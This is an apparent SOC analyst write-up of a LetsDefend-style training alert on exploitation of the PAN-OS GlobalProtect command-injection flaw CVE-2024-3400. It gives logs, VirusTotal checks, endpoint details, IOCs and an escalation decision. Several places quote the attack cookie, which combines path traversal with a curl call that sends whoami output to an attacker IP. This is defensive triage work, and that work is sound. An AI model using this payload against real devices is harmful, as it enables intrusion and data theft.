SOC274 — Palo Alto Networks PAN-OS Command Injection Vulnerability Exploitation (CVE-2024–3400)
by Tomasz Kozlowski
Ticket INFO:
A critical command injection vulnerability has been identified in Palo Alto Networks PAN-OS software
EventID :
249
Event Time :
Apr, 18, 2024, 03:09 AM
Rule :
SOC274 — Palo Alto Networks PAN-OS Command Injection Vulnerability Exploitation (CVE-2024–3400)
Level :
Security Analyst
Hostname :
PA-Firewall-01
Destination IP Address :
172.16.17.139
Source IP Address :
144.172.79.92
HTTP Request Method :
POST
Requested URL :
172.16.17.139/global-protect/login.esp
cookie :
SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)
Alert Trigger Reason :
Characteristics exploit pattern Detected on Cookie and Request, indicative exploitation of the CVE-2024–3400.
Device Action :
Allowed.
SOC Analyst Action:
Checking Log Managment Tab for 144(.)172.79.92 and VirusTotal.
Logs:
RAW LOG
2024–04–18 15:09:42,628: dt_send INFO TX_DIR: send file dir: /opt/panlogs/tmp/device_telemetry/day/, n_files: 1
2024–04–18 15:09:42,628 : dt_send INFO sorted file list: tmp_dir: /opt/panlogs/tmp/device_telemetry/day/*2024–04–18 15:09:42,629: dt_send INFO TX_DIR: send file dir: fname: /opt/panlogs/tmp/device_telemetry/day/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)2024–04–18 15:09:42,629 : dt_send INFO TX FILE: send_fname: /opt/panlogs/tmp/device_telemetry/day/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)2024–04–18 15:09:42,630: dt_send INFO TX_FILE: dest server ip: 144.172.79.922024–04–18 15:09:42,630 : dt_send INFO TX FILE: send_file_cmd: /usr/local/bin/dt_curl -i 172.16.17.139 -f /opt/panlogs/tmp/device_telemetry/day/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)2024–04–18 15:09:43,152: dt_send INFO TX FILE: curl cmd status: 24, 24; err msg: ‘DNS lookup failed’
VirusTotal:12 security vendors flagged this IP as malicious.
hxxps://www.virustotal.com/gui/ip-address/144.172.79.92/community
Checks on Endpoint security:
Event Time :
Apr 18 2024 15:09:55
Process ID :
1233
Target Process Command Line :
/usr/libexec/mgmtsrvr/start
Image Path :
/usr/bin/python3
Image Hash :
3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927…
Process User :
letsdefend
Parent Name :
systemd
Parent Path :
/lib/systemd/systemd
Command Line :
/usr/bin/python3 update.py
Hash confirmed by Virus Total:
hxxps://www.virustotal.com/gui/file/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac
Case :
Malicious.
The answer is Command injection.
Not planned
Internet -Company Network.
Yes.
Action : Escalation to TIER 2 and contamination of the server until further investigation and remediation. Confirmed Command injection attack.
Evidence:
IP 144.172.79[.]92
Cookie SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa
`curl${IFS}144.172.79[.]92:4444?user=$(whoami)
File update.py
Hash :
MD5
0c1554888ce9ed0da1583dbdf7b31651
SHA-1
988fc0d23e6e30c2c46ccec9bbff50b7453b8ba9
SHA-256
3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac
URL 172[.]16.17.139/global-protect/login.esp
Verdict: TRUE POSITIVE
Thanks All.
Tomasz Kozlowski
Cyber Security Analyst.